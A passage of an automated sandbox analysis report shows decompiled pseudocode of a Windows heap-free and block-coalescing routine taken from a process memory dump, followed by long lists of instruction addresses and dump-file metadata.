							L59:
							_push(0);
							_push( *_t396);
							_push(_t261);
							_push(_t355);
							_t356 = 0xd;
							E1E715FED(_t356, _t416);
							L60:
							_v5 = 0;
							goto L5;
						}
						__eflags =  *_t396 - _t355;
						if( *_t396 != _t355) {
							goto L59;
						}
						 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t319 & 0x0000ffff);
						_t403 =  *(_t416 + 0xb4);
						__eflags = _t403;
						if(_t403 == 0) {
							L46:
							_t368 = _v16;
							_t291 = _v12;
							 *_t368 = _t291;
							 *((intOrPtr*)(_t291 + 4)) = _t368;
							__eflags = _t319[1] & 0x00000008;
							if((_t319[1] & 0x00000008) == 0) {
								L49:
								_t369 = _t319[1];
								__eflags = _t369 & 0x00000004;
								if((_t369 & 0x00000004) != 0) {
									_t293 = ( *_t319 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t293;
									__eflags = _t369 & 0x00000002;
									if((_t369 & 0x00000002) != 0) {
										__eflags = _t293 - 4;
										if(_t293 > 4) {
											_t293 = _t293 - 4;
											__eflags = _t293;
											_v12 = _t293;
										}
									}
									_t295 = E1E6A80A0( &(_t319[8]), _t293, 0xfeeefeee);
									_v16 = _t295;
									__eflags = _t295 - _v12;
									if(_t295 != _v12) {
										_t370 =  *[fs:0x30];
										__eflags =  *(_t370 + 0xc);
										if( *(_t370 + 0xc) == 0) {
											_push("HEAP: ");
											E1E64B910();
										} else {
											E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t319);
										E1E64B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t319);
										_t301 =  *[fs:0x30];
										_t419 = _t419 + 0xc;
										__eflags =  *((char*)(_t301 + 2));
										if( *((char*)(_t301 + 2)) != 0) {
											 *0x1e7447a1 = 1;
											asm("int3");
											 *0x1e7447a1 = 0;
										}
									}
								}
								goto L60;
							}
							_t305 = E1E64F5C7(_t416, _t319);
							__eflags = _t305;
							if(_t305 != 0) {
								goto L49;
							}
							E1E64F113(_t416, _t319,  *_t319 & 0x0000ffff, 1);
							goto L60;
						}
						_t377 =  *_t319 & 0x0000ffff;
						while(1) {
							__eflags = _t377 -  *((intOrPtr*)(_t403 + 4));
							if(_t377 <  *((intOrPtr*)(_t403 + 4))) {
								break;
							}
							_t308 =  *_t403;
							__eflags = _t308;
							if(_t308 == 0) {
								_t310 =  *((intOrPtr*)(_t403 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t403 + 4)) - 1;
								L45:
								E1E66036A(_t416, _t403, 1,  &(_t319[4]), _t310, _t377);
								goto L46;
							}
							_t403 = _t308;
						}
						_t310 = _t377;
						goto L45;
					}
					L5:
					_t398 = _t409[6];
					_t357 =  &(_t409[4]);
					_t263 =  *_t357;
					_v12 = _t263;
					_v20 = _t398;
					_t264 =  *((intOrPtr*)(_t263 + 4));
					if( *_t398 == _t264) {
						__eflags =  *_t398 - _t357;
						if( *_t398 != _t357) {
							goto L6;
						}
						 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t409 & 0x0000ffff);
						_t400 =  *(_t416 + 0xb4);
						__eflags = _t400;
						if(_t400 == 0) {
							L21:
							_t358 = _v20;
							_t267 = _v12;
							 *_t358 = _t267;
							 *(_t267 + 4) = _t358;
							__eflags = _t409[1] & 0x00000008;
							if((_t409[1] & 0x00000008) != 0) {
								_t268 = E1E64F5C7(_t416, _t409);
								__eflags = _t268;
								if(_t268 != 0) {
									goto L22;
								}
								_t322 = _t416;
								E1E64F113(_t322, _t409,  *_t409 & 0x0000ffff, 1);
								goto L7;
							}
							L22:
							_t360 = _t409[1];
							__eflags = _t360 & 0x00000004;
							if((_t360 & 0x00000004) != 0) {
								_t321 = ( *_t409 & 0x0000ffff) * 8 - 0x10;
								__eflags = _t360 & 0x00000002;
								if((_t360 & 0x00000002) != 0) {
									__eflags = _t321 - 4;
									if(_t321 > 4) {
										_t321 = _t321 - 4;
									}
								}
								_t271 = E1E6A80A0( &(_t409[8]), _t321, 0xfeeefeee);
								_v20 = _t271;
								__eflags = _t271 - _t321;
								if(_t271 != _t321) {
									_t362 =  *[fs:0x30];
									__eflags =  *(_t362 + 0xc);
									if( *(_t362 + 0xc) != 0) {
										__eflags =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c;
										E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									} else {
										_push("HEAP: ");
										E1E64B910();
									}
									_push(_v20 + 0x10 + _t409);
									E1E64B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t409);
									_t282 =  *[fs:0x30];
									_t419 = _t419 + 0xc;
									__eflags =  *((char*)(_t282 + 2));
									if( *((char*)(_t282 + 2)) != 0) {
										 *0x1e7447a1 = 1;
										asm("int3");
										 *0x1e7447a1 = 0;
									}
								}
							}
							_t380 = _a4;
							_t319 = _t409;
							_t409[1] = 0;
							_t409[3] = 0;
							 *_t380 =  *_t380 + ( *_t409 & 0x0000ffff);
							 *_t409 =  *_t380;
							_t322 =  *_t380 ^  *(_t416 + 0x54);
							 *(_t409 + 4 +  *_t380 * 8) = _t322;
							L8:
							_t410 = _t319 +  *_t380 * 8;
							if( *(_t416 + 0x4c) == 0) {
								L10:
								while((( *(_t416 + 0x4c) >> 0x00000014 &  *(_t416 + 0x52) ^ _t410[0]) & 0x00000001) == 0) {
									__eflags =  *(_t416 + 0x4c);
									if( *(_t416 + 0x4c) != 0) {
										 *_t410 =  *_t410 ^  *(_t416 + 0x50);
										__eflags = _t410[0] - (_t410[0] ^  *_t410 ^ _t410[0]);
										if(__eflags != 0) {
											_push(_t322);
											E1E70D646(_t319, _t416, _t410, _t410, _t416, __eflags);
										}
									}
									__eflags = _v5;
									if(_v5 == 0) {
										L94:
										_t381 = _t410[3];
										_t323 =  &(_t410[2]);
										_t192 =  *_t323;
										_v20 = _t192;
										_v16 = _t381;
										_t193 =  *((intOrPtr*)(_t192 + 4));
										__eflags =  *_t381 - _t193;
										if( *_t381 != _t193) {
											L63:
											_push(0);
											_push( *_t381);
											_push(_t193);
											_push(_t323);
											_push(0xd);
											L64:
											_pop(_t322);
											E1E715FED(_t322, _t416);
											continue;
										}
										__eflags =  *_t381 - _t323;
										if( *_t381 != _t323) {
											goto L63;
										}
										 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t410 & 0x0000ffff);
										_t389 =  *(_t416 + 0xb4);
										__eflags = _t389;
										if(_t389 == 0) {
											L104:
											_t339 = _v16;
											_t196 = _v20;
											 *_t339 = _t196;
											 *(_t196 + 4) = _t339;
											__eflags = _t410[0] & 0x00000008;
											if((_t410[0] & 0x00000008) == 0) {
												L107:
												_t340 = _t410[0];
												__eflags = _t340 & 0x00000004;
												if((_t340 & 0x00000004) != 0) {
													_t202 = ( *_t410 & 0x0000ffff) * 8 - 0x10;
													_v12 = _t202;
													__eflags = _t340 & 0x00000002;
													if((_t340 & 0x00000002) != 0) {
														__eflags = _t202 - 4;
														if(_t202 > 4) {
															_t202 = _t202 - 4;
															__eflags = _t202;
															_v12 = _t202;
														}
													}
													_t203 = E1E6A80A0( &(_t410[4]), _t202, 0xfeeefeee);
													_v20 = _t203;
													__eflags = _t203 - _v12;
													if(_t203 != _v12) {
														_t344 =  *[fs:0x30];
														__eflags =  *(_t344 + 0xc);
														if( *(_t344 + 0xc) == 0) {
															_push("HEAP: ");
															E1E64B910();
														} else {
															E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
														}
														_push(_v20 + 0x10 + _t410);
														E1E64B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t410);
														_t209 =  *[fs:0x30];
														__eflags =  *((char*)(_t209 + 2));
														if( *((char*)(_t209 + 2)) != 0) {
															 *0x1e7447a1 = 1;
															asm("int3");
															 *0x1e7447a1 = 0;
														}
													}
												}
												_t390 = _a4;
												_t319[1] = 0;
												_t319[3] = 0;
												 *_t390 =  *_t390 + ( *_t410 & 0x0000ffff);
												 *_t319 =  *_t390;
												 *(_t319 + 4 +  *_t390 * 8) =  *_t390 ^  *(_t416 + 0x54);
												break;
											}
											_t213 = E1E64F5C7(_t416, _t410);
											__eflags = _t213;
											if(_t213 != 0) {
												goto L107;
											}
											_t322 = _t416;
											E1E64F113(_t322, _t410,  *_t410 & 0x0000ffff, 1);
											continue;
										}
										_t350 =  *_t410 & 0x0000ffff;
										while(1) {
											__eflags = _t350 -  *((intOrPtr*)(_t389 + 4));
											if(_t350 <  *((intOrPtr*)(_t389 + 4))) {
												break;
											}
											_t216 =  *_t389;
											__eflags = _t216;
											if(_t216 == 0) {
												_t218 =  *((intOrPtr*)(_t389 + 4)) - 1;
												__eflags =  *((intOrPtr*)(_t389 + 4)) - 1;
												L103:
												E1E66036A(_t416, _t389, 1,  &(_t410[2]), _t218, _t350);
												goto L104;
											}
											_t389 = _t216;
										}
										_t218 = _t350;
										goto L103;
									} else {
										_t383 = _t319[6];
										_t324 =  &(_t319[4]);
										_t221 =  *_t324;
										_v20 = _t221;
										_v16 = _t383;
										_t222 =  *((intOrPtr*)(_t221 + 4));
										__eflags =  *_t383 - _t222;
										if( *_t383 != _t222) {
											L92:
											_push(0);
											_push( *_t383);
											_push(_t222);
											_push(_t324);
											_t325 = 0xd;
											E1E715FED(_t325, _t416);
											L93:
											_v5 = 0;
											goto L94;
										}
										__eflags =  *_t383 - _t324;
										if( *_t383 != _t324) {
											goto L92;
										}
										 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t319 & 0x0000ffff);
										_t385 =  *(_t416 + 0xb4);
										__eflags = _t385;
										if(_t385 == 0) {
											L79:
											_t326 = _v16;
											_t225 = _v20;
											 *_t326 = _t225;
											 *(_t225 + 4) = _t326;
											__eflags = _t319[1] & 0x00000008;
											if((_t319[1] & 0x00000008) == 0) {
												L82:
												_t327 = _t319[1];
												__eflags = _t327 & 0x00000004;
												if((_t327 & 0x00000004) != 0) {
													_t227 = ( *_t319 & 0x0000ffff) * 8 - 0x10;
													_v12 = _t227;
													__eflags = _t327 & 0x00000002;
													if((_t327 & 0x00000002) != 0) {
														__eflags = _t227 - 4;
														if(_t227 > 4) {
															_t227 = _t227 - 4;
															__eflags = _t227;
															_v12 = _t227;
														}
													}
													_t228 = E1E6A80A0( &(_t319[8]), _t227, 0xfeeefeee);
													_v20 = _t228;
													__eflags = _t228 - _v12;
													if(_t228 != _v12) {
														_t329 =  *[fs:0x30];
														__eflags =  *(_t329 + 0xc);
														if( *(_t329 + 0xc) == 0) {
															_push("HEAP: ");
															E1E64B910();
														} else {
															E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
														}
														_push(_v20 + 0x10 + _t319);
														E1E64B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t319);
														_t234 =  *[fs:0x30];
														_t419 = _t419 + 0xc;
														__eflags =  *((char*)(_t234 + 2));
														if( *((char*)(_t234 + 2)) != 0) {
															 *0x1e7447a1 = 1;
															asm("int3");
															 *0x1e7447a1 = 0;
														}
													}
												}
												goto L93;
											}
											_t238 = E1E64F5C7(_t416, _t319);
											__eflags = _t238;
											if(_t238 != 0) {
												goto L82;
											}
											E1E64F113(_t416, _t319,  *_t319 & 0x0000ffff, 1);
											goto L93;
										}
										_t336 =  *_t319 & 0x0000ffff;
										while(1) {
											__eflags = _t336 -  *((intOrPtr*)(_t385 + 4));
											if(_t336 <  *((intOrPtr*)(_t385 + 4))) {
												break;
											}
											_t241 =  *_t385;
											__eflags = _t241;
											if(_t241 == 0) {
												_t243 =  *((intOrPtr*)(_t385 + 4)) - 1;
												__eflags =  *((intOrPtr*)(_t385 + 4)) - 1;
												L78:
												E1E66036A(_t416, _t385, 1,  &(_t319[4]), _t243, _t336);
												goto L79;
											}
											_t385 = _t241;
										}
										_t243 = _t336;
										goto L78;
									}
								}
								return _t319;
							}
							_t251 =  *_t410;
							_t394 =  *(_t416 + 0x50) ^ _t251;
							_v28 = _t251;
							_v28 = _t394;
							_t322 = _t394 >> 0x00000010 ^ _t394 >> 0x00000008 ^ _t394;
							if(_t394 >> 0x18 != _t322) {
								_push(0);
								_push(0);
								_push(0);
								_push(_t410);
								_push(3);
								goto L64;
							}
							goto L10;
						} else {
							_t286 =  *_t409 & 0x0000ffff;
							_v16 = _t286;
							while(1) {
								__eflags = _t286 -  *((intOrPtr*)(_t400 + 4));
								if(_t286 <  *((intOrPtr*)(_t400 + 4))) {
									break;
								}
								_t288 =  *_t400;
								__eflags = _t288;
								if(_t288 == 0) {
									_t286 =  *((intOrPtr*)(_t400 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t400 + 4)) - 1;
									break;
								} else {
									_t400 = _t288;
									_t286 =  *_t409 & 0x0000ffff;
									continue;
								}
							}
							E1E66036A(_t416, _t400, 1, _t357, _t286, _v16);
							goto L21;
						}
					}
					L6:
					_push(0);
					_push( *_t398);
					_push(_t264);
					_push(_t357);
					_t322 = 0xd;
					E1E715FED(_t322, _t416);
					goto L7;
				}
			}




















































































                                                                                                                0x1e661eb2
                                                                                                                0x1e661ebb
                                                                                                                0x1e661ebf
                                                                                                                0x1e661ece
                                                                                                                0x1e661ed0
                                                                                                                0x1e661ed4
                                                                                                                0x1e661f91
                                                                                                                0x1e661f3d
                                                                                                                0x1e661f3d
                                                                                                                0x00000000
                                                                                                                0x1e661eee
                                                                                                                0x1e661ef2
                                                                                                                0x1e661ef7
                                                                                                                0x1e661f04
                                                                                                                0x1e6b5b5c
                                                                                                                0x1e6b5b5f
                                                                                                                0x1e6b5b5f
                                                                                                                0x1e661f04
                                                                                                                0x1e661f0a
                                                                                                                0x1e661f0d
                                                                                                                0x1e661f12
                                                                                                                0x1e6b5b69
                                                                                                                0x1e6b5b6c
                                                                                                                0x1e6b5b6f
                                                                                                                0x1e6b5b71
                                                                                                                0x1e6b5b74
                                                                                                                0x1e6b5b77
                                                                                                                0x1e6b5b7a
                                                                                                                0x1e6b5b7c
                                                                                                                0x1e6b5c9f
                                                                                                                0x1e6b5c9f
                                                                                                                0x1e6b5ca1
                                                                                                                0x1e6b5ca5
                                                                                                                0x1e6b5ca6
                                                                                                                0x1e6b5ca9
                                                                                                                0x1e6b5caa
                                                                                                                0x1e6b5caf
                                                                                                                0x1e6b5caf
                                                                                                                0x00000000
                                                                                                                0x1e6b5caf
                                                                                                                0x1e6b5b82
                                                                                                                0x1e6b5b84
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5b8d
                                                                                                                0x1e6b5b90
                                                                                                                0x1e6b5b96
                                                                                                                0x1e6b5b98
                                                                                                                0x1e6b5bc3
                                                                                                                0x1e6b5bc3
                                                                                                                0x1e6b5bc6
                                                                                                                0x1e6b5bc9
                                                                                                                0x1e6b5bcb
                                                                                                                0x1e6b5bce
                                                                                                                0x1e6b5bd2
                                                                                                                0x1e6b5bf5
                                                                                                                0x1e6b5bf5
                                                                                                                0x1e6b5bf8
                                                                                                                0x1e6b5bfb
                                                                                                                0x1e6b5c04
                                                                                                                0x1e6b5c0b
                                                                                                                0x1e6b5c0e
                                                                                                                0x1e6b5c11
                                                                                                                0x1e6b5c13
                                                                                                                0x1e6b5c16
                                                                                                                0x1e6b5c18
                                                                                                                0x1e6b5c18
                                                                                                                0x1e6b5c1b
                                                                                                                0x1e6b5c1b
                                                                                                                0x1e6b5c16
                                                                                                                0x1e6b5c28
                                                                                                                0x1e6b5c2d
                                                                                                                0x1e6b5c30
                                                                                                                0x1e6b5c33
                                                                                                                0x1e6b5c35
                                                                                                                0x1e6b5c3c
                                                                                                                0x1e6b5c40
                                                                                                                0x1e6b5c60
                                                                                                                0x1e6b5c65
                                                                                                                0x1e6b5c42
                                                                                                                0x1e6b5c58
                                                                                                                0x1e6b5c5d
                                                                                                                0x1e6b5c73
                                                                                                                0x1e6b5c7a
                                                                                                                0x1e6b5c7f
                                                                                                                0x1e6b5c85
                                                                                                                0x1e6b5c88
                                                                                                                0x1e6b5c8c
                                                                                                                0x1e6b5c8e
                                                                                                                0x1e6b5c95
                                                                                                                0x1e6b5c96
                                                                                                                0x1e6b5c96
                                                                                                                0x1e6b5c8c
                                                                                                                0x1e6b5c33
                                                                                                                0x00000000
                                                                                                                0x1e6b5bfb
                                                                                                                0x1e6b5bd8
                                                                                                                0x1e6b5bdd
                                                                                                                0x1e6b5bdf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5beb
                                                                                                                0x00000000
                                                                                                                0x1e6b5beb
                                                                                                                0x1e6b5b9a
                                                                                                                0x1e6b5ba7
                                                                                                                0x1e6b5ba7
                                                                                                                0x1e6b5baa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5b9f
                                                                                                                0x1e6b5ba1
                                                                                                                0x1e6b5ba3
                                                                                                                0x1e6b5bb3
                                                                                                                0x1e6b5bb3
                                                                                                                0x1e6b5bb4
                                                                                                                0x1e6b5bbe
                                                                                                                0x00000000
                                                                                                                0x1e6b5bbe
                                                                                                                0x1e6b5ba5
                                                                                                                0x1e6b5ba5
                                                                                                                0x1e6b5bac
                                                                                                                0x00000000
                                                                                                                0x1e6b5bac
                                                                                                                0x1e661f18
                                                                                                                0x1e661f18
                                                                                                                0x1e661f1b
                                                                                                                0x1e661f1e
                                                                                                                0x1e661f20
                                                                                                                0x1e661f23
                                                                                                                0x1e661f26
                                                                                                                0x1e661f2b
                                                                                                                0x1e661f96
                                                                                                                0x1e661f98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e661f9d
                                                                                                                0x1e661fa0
                                                                                                                0x1e661fa6
                                                                                                                0x1e661fa8
                                                                                                                0x1e661fd4
                                                                                                                0x1e661fd4
                                                                                                                0x1e661fd7
                                                                                                                0x1e661fda
                                                                                                                0x1e661fdc
                                                                                                                0x1e661fdf
                                                                                                                0x1e661fe3
                                                                                                                0x1e6620c0
                                                                                                                0x1e6620c5
                                                                                                                0x1e6620c7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5cc0
                                                                                                                0x1e6b5cc2
                                                                                                                0x00000000
                                                                                                                0x1e6b5cc2
                                                                                                                0x1e661fe9
                                                                                                                0x1e661fe9
                                                                                                                0x1e661fec
                                                                                                                0x1e661fef
                                                                                                                0x1e66201f
                                                                                                                0x1e662026
                                                                                                                0x1e662029
                                                                                                                0x1e66205a
                                                                                                                0x1e66205d
                                                                                                                0x1e66205f
                                                                                                                0x1e66205f
                                                                                                                0x1e66205d
                                                                                                                0x1e662035
                                                                                                                0x1e66203a
                                                                                                                0x1e66203d
                                                                                                                0x1e66203f
                                                                                                                0x1e662041
                                                                                                                0x1e662048
                                                                                                                0x1e66204c
                                                                                                                0x1e662071
                                                                                                                0x1e66207a
                                                                                                                0x1e66204e
                                                                                                                0x1e66204e
                                                                                                                0x1e662053
                                                                                                                0x1e662053
                                                                                                                0x1e662089
                                                                                                                0x1e662090
                                                                                                                0x1e662095
                                                                                                                0x1e66209b
                                                                                                                0x1e66209e
                                                                                                                0x1e6620a2
                                                                                                                0x1e6620a8
                                                                                                                0x1e6620af
                                                                                                                0x1e6620b0
                                                                                                                0x1e6620b0
                                                                                                                0x1e6620a2
                                                                                                                0x1e66203f
                                                                                                                0x1e661ff1
                                                                                                                0x1e661ff4
                                                                                                                0x1e661ff9
                                                                                                                0x1e661ffd
                                                                                                                0x1e662001
                                                                                                                0x1e662006
                                                                                                                0x1e66200e
                                                                                                                0x1e662012
                                                                                                                0x1e661f40
                                                                                                                0x1e661f46
                                                                                                                0x1e661f49
                                                                                                                0x00000000
                                                                                                                0x1e661f71
                                                                                                                0x1e6b5ceb
                                                                                                                0x1e6b5cef
                                                                                                                0x1e6b5cf4
                                                                                                                0x1e6b5cfe
                                                                                                                0x1e6b5d01
                                                                                                                0x1e6b5d03
                                                                                                                0x1e6b5d08
                                                                                                                0x1e6b5d08
                                                                                                                0x1e6b5d01
                                                                                                                0x1e6b5d0d
                                                                                                                0x1e6b5d11
                                                                                                                0x1e6b5e61
                                                                                                                0x1e6b5e61
                                                                                                                0x1e6b5e64
                                                                                                                0x1e6b5e67
                                                                                                                0x1e6b5e69
                                                                                                                0x1e6b5e6c
                                                                                                                0x1e6b5e6f
                                                                                                                0x1e6b5e72
                                                                                                                0x1e6b5e74
                                                                                                                0x1e6b5cd6
                                                                                                                0x1e6b5cd6
                                                                                                                0x1e6b5cd8
                                                                                                                0x1e6b5cda
                                                                                                                0x1e6b5cdb
                                                                                                                0x1e6b5cdc
                                                                                                                0x1e6b5cde
                                                                                                                0x1e6b5ce0
                                                                                                                0x1e6b5ce1
                                                                                                                0x00000000
                                                                                                                0x1e6b5ce1
                                                                                                                0x1e6b5e7a
                                                                                                                0x1e6b5e7c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5e85
                                                                                                                0x1e6b5e88
                                                                                                                0x1e6b5e8e
                                                                                                                0x1e6b5e90
                                                                                                                0x1e6b5ebb
                                                                                                                0x1e6b5ebb
                                                                                                                0x1e6b5ebe
                                                                                                                0x1e6b5ec1
                                                                                                                0x1e6b5ec3
                                                                                                                0x1e6b5ec6
                                                                                                                0x1e6b5eca
                                                                                                                0x1e6b5eed
                                                                                                                0x1e6b5eed
                                                                                                                0x1e6b5ef0
                                                                                                                0x1e6b5ef3
                                                                                                                0x1e6b5efc
                                                                                                                0x1e6b5f03
                                                                                                                0x1e6b5f06
                                                                                                                0x1e6b5f09
                                                                                                                0x1e6b5f0b
                                                                                                                0x1e6b5f0e
                                                                                                                0x1e6b5f10
                                                                                                                0x1e6b5f10
                                                                                                                0x1e6b5f13
                                                                                                                0x1e6b5f13
                                                                                                                0x1e6b5f0e
                                                                                                                0x1e6b5f20
                                                                                                                0x1e6b5f25
                                                                                                                0x1e6b5f28
                                                                                                                0x1e6b5f2b
                                                                                                                0x1e6b5f2d
                                                                                                                0x1e6b5f34
                                                                                                                0x1e6b5f38
                                                                                                                0x1e6b5f58
                                                                                                                0x1e6b5f5d
                                                                                                                0x1e6b5f3a
                                                                                                                0x1e6b5f50
                                                                                                                0x1e6b5f55
                                                                                                                0x1e6b5f6b
                                                                                                                0x1e6b5f72
                                                                                                                0x1e6b5f77
                                                                                                                0x1e6b5f80
                                                                                                                0x1e6b5f84
                                                                                                                0x1e6b5f86
                                                                                                                0x1e6b5f8d
                                                                                                                0x1e6b5f8e
                                                                                                                0x1e6b5f8e
                                                                                                                0x1e6b5f84
                                                                                                                0x1e6b5f2b
                                                                                                                0x1e6b5f95
                                                                                                                0x1e6b5f98
                                                                                                                0x1e6b5f9c
                                                                                                                0x1e6b5fa3
                                                                                                                0x1e6b5fa8
                                                                                                                0x1e6b5fb4
                                                                                                                0x00000000
                                                                                                                0x1e6b5fb4
                                                                                                                0x1e6b5ed0
                                                                                                                0x1e6b5ed5
                                                                                                                0x1e6b5ed7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5ee1
                                                                                                                0x1e6b5ee3
                                                                                                                0x00000000
                                                                                                                0x1e6b5ee3
                                                                                                                0x1e6b5e92
                                                                                                                0x1e6b5e9f
                                                                                                                0x1e6b5e9f
                                                                                                                0x1e6b5ea2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5e97
                                                                                                                0x1e6b5e99
                                                                                                                0x1e6b5e9b
                                                                                                                0x1e6b5eab
                                                                                                                0x1e6b5eab
                                                                                                                0x1e6b5eac
                                                                                                                0x1e6b5eb6
                                                                                                                0x00000000
                                                                                                                0x1e6b5eb6
                                                                                                                0x1e6b5e9d
                                                                                                                0x1e6b5e9d
                                                                                                                0x1e6b5ea4
                                                                                                                0x00000000
                                                                                                                0x1e6b5d17
                                                                                                                0x1e6b5d17
                                                                                                                0x1e6b5d1a
                                                                                                                0x1e6b5d1d
                                                                                                                0x1e6b5d1f
                                                                                                                0x1e6b5d22
                                                                                                                0x1e6b5d25
                                                                                                                0x1e6b5d28
                                                                                                                0x1e6b5d2a
                                                                                                                0x1e6b5e4d
                                                                                                                0x1e6b5e4d
                                                                                                                0x1e6b5e4f
                                                                                                                0x1e6b5e53
                                                                                                                0x1e6b5e54
                                                                                                                0x1e6b5e57
                                                                                                                0x1e6b5e58
                                                                                                                0x1e6b5e5d
                                                                                                                0x1e6b5e5d
                                                                                                                0x00000000
                                                                                                                0x1e6b5e5d
                                                                                                                0x1e6b5d30
                                                                                                                0x1e6b5d32
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5d3b
                                                                                                                0x1e6b5d3e
                                                                                                                0x1e6b5d44
                                                                                                                0x1e6b5d46
                                                                                                                0x1e6b5d71
                                                                                                                0x1e6b5d71
                                                                                                                0x1e6b5d74
                                                                                                                0x1e6b5d77
                                                                                                                0x1e6b5d79
                                                                                                                0x1e6b5d7c
                                                                                                                0x1e6b5d80
                                                                                                                0x1e6b5da3
                                                                                                                0x1e6b5da3
                                                                                                                0x1e6b5da6
                                                                                                                0x1e6b5da9
                                                                                                                0x1e6b5db2
                                                                                                                0x1e6b5db9
                                                                                                                0x1e6b5dbc
                                                                                                                0x1e6b5dbf
                                                                                                                0x1e6b5dc1
                                                                                                                0x1e6b5dc4
                                                                                                                0x1e6b5dc6
                                                                                                                0x1e6b5dc6
                                                                                                                0x1e6b5dc9
                                                                                                                0x1e6b5dc9
                                                                                                                0x1e6b5dc4
                                                                                                                0x1e6b5dd6
                                                                                                                0x1e6b5ddb
                                                                                                                0x1e6b5dde
                                                                                                                0x1e6b5de1
                                                                                                                0x1e6b5de3
                                                                                                                0x1e6b5dea
                                                                                                                0x1e6b5dee
                                                                                                                0x1e6b5e0e
                                                                                                                0x1e6b5e13
                                                                                                                0x1e6b5df0
                                                                                                                0x1e6b5e06
                                                                                                                0x1e6b5e0b
                                                                                                                0x1e6b5e21
                                                                                                                0x1e6b5e28
                                                                                                                0x1e6b5e2d
                                                                                                                0x1e6b5e33
                                                                                                                0x1e6b5e36
                                                                                                                0x1e6b5e3a
                                                                                                                0x1e6b5e3c
                                                                                                                0x1e6b5e43
                                                                                                                0x1e6b5e44
                                                                                                                0x1e6b5e44
                                                                                                                0x1e6b5e3a
                                                                                                                0x1e6b5de1
                                                                                                                0x00000000
                                                                                                                0x1e6b5da9
                                                                                                                0x1e6b5d86
                                                                                                                0x1e6b5d8b
                                                                                                                0x1e6b5d8d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5d99
                                                                                                                0x00000000
                                                                                                                0x1e6b5d99
                                                                                                                0x1e6b5d48
                                                                                                                0x1e6b5d55
                                                                                                                0x1e6b5d55
                                                                                                                0x1e6b5d58
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5d4d
                                                                                                                0x1e6b5d4f
                                                                                                                0x1e6b5d51
                                                                                                                0x1e6b5d61
                                                                                                                0x1e6b5d61
                                                                                                                0x1e6b5d62
                                                                                                                0x1e6b5d6c
                                                                                                                0x00000000
                                                                                                                0x1e6b5d6c
                                                                                                                0x1e6b5d53
                                                                                                                0x1e6b5d53
                                                                                                                0x1e6b5d5a
                                                                                                                0x00000000
                                                                                                                0x1e6b5d5a
                                                                                                                0x1e6b5d11
                                                                                                                0x1e661f8b
                                                                                                                0x1e661f8b
                                                                                                                0x1e661f4b
                                                                                                                0x1e661f50
                                                                                                                0x1e661f52
                                                                                                                0x1e661f57
                                                                                                                0x1e661f64
                                                                                                                0x1e661f6b
                                                                                                                0x1e6b5cce
                                                                                                                0x1e6b5ccf
                                                                                                                0x1e6b5cd0
                                                                                                                0x1e6b5cd1
                                                                                                                0x1e6b5cd2
                                                                                                                0x00000000
                                                                                                                0x1e6b5cd2
                                                                                                                0x00000000
                                                                                                                0x1e661faa
                                                                                                                0x1e661faa
                                                                                                                0x1e661fad
                                                                                                                0x1e661fb0
                                                                                                                0x1e661fb0
                                                                                                                0x1e661fb3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e661fb5
                                                                                                                0x1e661fb7
                                                                                                                0x1e661fb9
                                                                                                                0x1e661fc5
                                                                                                                0x1e661fc5
                                                                                                                0x00000000
                                                                                                                0x1e661fbb
                                                                                                                0x1e661fbb
                                                                                                                0x1e661fbd
                                                                                                                0x00000000
                                                                                                                0x1e661fbd
                                                                                                                0x1e661fb9
                                                                                                                0x1e661fcf
                                                                                                                0x00000000
                                                                                                                0x1e661fcf
                                                                                                                0x1e661fa8
                                                                                                                0x1e661f2d
                                                                                                                0x1e661f2d
                                                                                                                0x1e661f2f
                                                                                                                0x1e661f33
                                                                                                                0x1e661f34
                                                                                                                0x1e661f37
                                                                                                                0x1e661f38
                                                                                                                0x00000000
                                                                                                                0x1e661f38

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
